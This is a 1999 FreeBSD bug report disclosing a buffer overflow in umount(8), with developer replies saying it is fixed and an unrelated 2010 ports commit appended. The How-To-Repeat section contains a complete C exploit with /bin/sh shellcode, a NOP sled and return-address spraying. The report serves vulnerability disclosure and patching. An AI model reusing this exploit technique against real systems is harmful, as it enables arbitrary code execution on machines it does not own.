Bug 14406 - [SECURITY] strcpy() buffer overflow in umount(8)
Summary: [SECURITY] strcpy() buffer overflow in umount(8)
Status: Closed FIXED
Alias: None
Product: Base System
Classification: Unclassified
Component: bin (show other bugs)
Version: 3.2-STABLE
Hardware: Any Any
: Normal Affects Only Me
Assignee: freebsd-bugs (Nobody)
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 1999-10-18 19:50 UTC by venglin
Modified: 2010-02-18 20:40 UTC (History)
0 users

See Also:

Attachments
file.diff (501 bytes, patch)
1999-10-18 19:50 UTC, venglin 		no flags Details | Diff
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description venglin 1999-10-18 19:50:00 UTC 
	It's possible to execute arbitrary code by overflowing buffer in
	umount(8).

	By default umount(8) is NOT installed with setuid or setgid bits set.

How-To-Repeat: 
/*
*
* (c) 1999 babcia padlina ltd. <babunia@FreeBSD.lublin.pl>
* FreeBSD /sbin/umount exploit.
*
*/

#include <stdio.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <string.h>

#define NOP		0x90
#define OFS		1800
#define BUFSIZE		1024
#define ADDRS		1200

long getesp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(argc, argv)
int argc;
char **argv;
{
	char *execshell =
	"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
	"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
	"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
	"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

	char *buf, *p;
	int noplen, i, ofs;
	long ret, *ap;

	if(!(buf = (char *)malloc(BUFSIZE+1)))
	{
		perror("malloc()");
		return -1;
	}

	if (argc > 2)
		ofs = atoi(argv[1]);
	else
		ofs = OFS;

	noplen = BUFSIZE - strlen(execshell);
	ret = getesp() + ofs;

	memset(buf, NOP, noplen);
	buf[noplen+1] = '\0';
	strcat(buf, execshell);

	setenv("EGG", buf, 1);

        if(!(buf = (char *)malloc(ADDRS+1)))      
        {
                perror("malloc()");
                return -1;
	}

	p = buf;
        ap = (unsigned long *)p;

        for(i = 0; i < ADDRS / 4; i++)
                *ap++ = ret;

        p = (char *)ap;
        *p = '\0';

	fprintf(stderr, "RET: 0x%x  len: %d\n\n", ret, strlen(buf));

	chmod(".", 0);		// fuck da realpath()!

	execl("/sbin/umount", "umount", buf, 0);

	return 0;
}
Comment 1 blapp 1999-10-19 05:40:05 UTC 
Hi,

This is fixed in current since 2 day's. CVSup to the newest sources and
try again. And you should not run umount(8) +s anyway :)

But we should fix it in releng_3 (and 2.2.8). Thank you very much for
your bugreport.

Martin
Comment 2 Brian Feldman freebsd_committer freebsd_triage 1999-12-18 23:41:14 UTC 
State Changed
From-To: open->closed

This has been fixed in -CURRENT and 3.3/3.4.
Comment 3 dfilter service freebsd_committer freebsd_triage 2010-02-18 20:29:59 UTC 
brooks      2010-02-18 20:29:51 UTC

  FreeBSD ports repository

  Modified files:
    www/ftasv            Makefile 
  Log:
  This port works fine with Apache 2.0 so adjust USE_APACHE accordingly.
  
  Approved by:    sylvio (maintainer)
  Feature safe:   yes
  PR:             ports/14406
  
  Revision  Changes    Path
  1.3       +1 -1      ports/www/ftasv/Makefile
_______________________________________________
cvs-all@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/cvs-all
To unsubscribe, send any mail to "cvs-all-unsubscribe@freebsd.org"